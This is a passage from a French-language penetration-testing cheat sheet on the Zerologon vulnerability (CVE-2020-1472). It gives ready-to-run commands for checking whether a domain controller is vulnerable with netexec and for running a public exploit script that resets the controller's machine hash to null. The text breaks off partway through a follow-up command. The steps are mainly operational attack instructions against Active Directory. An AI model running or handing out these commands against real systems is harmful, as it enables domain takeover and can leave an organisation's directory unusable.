Dans la pratique, la faille Zerologon (CVE-2020-1472) permet à un attaquant de prendre le contrôle d'un contrôleur de domaine, principalement de deux manières :
## Remplacer le hash du DC par un hash null
Utilisation de [https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py](https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py) :
Cet exploit va remplacer le hash du DC par un hash null, le problème de cette méthode est donc que l'AD va vite devenir inutilisable :
---
### Depuis Linux
#### Vérifier si le DC est vulnérable
```bash
netexec smb 10.10.10.10 -u "" -p "" -M zerologon
```
#### Exploitation de la faille
```bash
cve-2020-1472-exploit.py 'nomDuDC' 'adresseIpDuDC'
```
```bash
netexec smb 10.10.10.10 -u 'DC0